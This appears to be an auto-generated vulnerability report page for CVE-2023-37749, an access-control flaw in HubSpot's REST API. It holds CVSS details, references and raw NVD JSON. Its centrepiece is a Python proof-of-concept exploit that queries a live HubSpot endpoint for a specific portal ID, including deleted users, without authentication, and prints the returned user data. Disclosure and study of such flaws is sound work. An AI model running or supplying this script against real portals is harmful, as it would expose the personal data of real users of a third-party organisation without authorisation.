Security Vulnerability Report
CVE-2023-37749 CVSS 5.3 MEDIUM

CVE-2023-37749

Published: 2025-10-27 16:15:34
Last Modified: 2026-04-15 00:35:42

Description

Incorrect access control in the REST API endpoint of HubSpot v1.29441 allows unauthenticated attackers to view users' data without proper authorization.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HubSpot v1.29441

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-37749 PoC - HubSpot Unauthenticated User Data Access
# Affected Version: HubSpot v1.29441
# Vulnerability: Incorrect Access Control in REST API Endpoint

import json

import requests


def exploit_hubspot_cve_2023_37749():
    """
    Exploit for CVE-2023-37749: HubSpot REST API Unauthorized User Data Access

    This PoC demonstrates how an unauthenticated attacker can access user data
    through a misconfigured REST API endpoint.
    """
    target_url = "https://app.hubspot.com/api/external-options/v2/pagedFetch/0-1/OWNER"
    # Query parameters taken from the reference URL in the advisory.
    params = {
        "useIndexOffset": "true",
        "portalId": "22152277",
        "clienttimeout": "14000",
        "hs_static_app": "settings-ui-users",
        "hs_static_app_version": "1.43001",
        "limit": "200",
        "q": "",
        "offset": "0",
        "includeDeleted": "true",
    }
    # No Authorization header, API key or session cookie is sent: the request is unauthenticated.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "application/json",
    }

    print("[*] Attempting to exploit CVE-2023-37749...")
    print(f"[*] Target URL: {target_url}")

    try:
        response = requests.get(target_url, params=params, headers=headers, timeout=30)
        if response.status_code == 200:
            print("[+] Request successful - User data may be exposed!")
            data = response.json()
            print(f"[+] Response received: {json.dumps(data, indent=2)[:500]}...")
            return data
        elif response.status_code == 401:
            # A 401 means the endpoint now enforces authentication.
            print("[-] Authentication required - Endpoint may be patched")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

    return None


if __name__ == "__main__":
    exploit_hubspot_cve_2023_37749()

References

https://app.hubspot.com/api/external-options/v2/pagedFetch/0-1/OWNER?useIndexOffset=true&portalId=22152277&clienttimeout=14000&hs_static_app=settings-ui-users&hs_static_app_version=1.43001&limit=200&q=&offset=0&includeDeleted=true
https://gist.github.com/0xDBJ/28072f7eea42571d5b4ebaabdcb21cce
https://owasp.org/Top10/A01_2021-Broken_Access_Control/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-37749", "sourceIdentifier": "[email protected]", "published": "2025-10-27T16:15:34.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in the REST API endpoint of HubSpot v1.29441 allows unauthenticated attackers to view users' data without proper authorization."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://app.hubspot.com/api/external-options/v2/pagedFetch/0-1/OWNER?useIndexOffset=true&portalId=22152277&clienttimeout=14000&hs_static_app=settings-ui-users&hs_static_app_version=1.43001&limit=200&q=&offset=0&includeDeleted=true", "source": "[email protected]"}, {"url": "https://gist.github.com/0xDBJ/28072f7eea42571d5b4ebaabdcb21cce", "source": "[email protected]"}, {"url": "https://owasp.org/Top10/A01_2021-Broken_Access_Control/", "source": "[email protected]"}]}}